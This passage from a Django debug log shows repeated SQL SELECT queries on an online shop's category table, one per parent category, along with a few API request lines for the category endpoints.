"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 14:10:44,779 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:10:44,788 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:44,793 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:10:44,798 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) [13/Dec/2019 14:10:44] "GET /api/v1/categories/4 HTTP/1.0" 200 952 DEBUG 2019-12-13 14:10:44,803 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:10:44,807 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:10:44,813 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:10:44,818 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:10:44,822 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:10:44,827 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:10:44,830 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:10:44,837 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:10:44,840 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:10:44,843 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:10:44,845 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:10:44,847 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:10:44,850 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:44,853 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:10:44,856 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:10:44,858 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:10:44,860 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:10:44,863 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:10:44,868 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:10:44,871 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:10:44,873 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:10:44,876 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:10:44,878 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:10:44,882 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:10:44,884 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:10:44,887 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:10:44,889 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:10:44,892 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:10:44,896 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:10:44,901 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:10:44,903 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:10:44,906 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:10:44,909 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:10:44,911 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:10:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:10:52,416 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:10:52,427 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:10:52,433 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:10:52,437 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:52,445 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:10:52,450 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:10:52,454 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:10:52,458 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:10:52,462 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:52,469 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:10:52,473 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:10:52,477 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:10:52,482 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:10:52,486 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:10:52,492 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:10:52,496 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:10:52,500 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:10:52,504 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:10:52,509 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:10:52,516 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:10:52,520 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:10:52,524 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:10:52,528 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:10:52,533 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:10:52,537 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:52,543 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:10:52,547 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:10:52,551 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:10:52,556 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 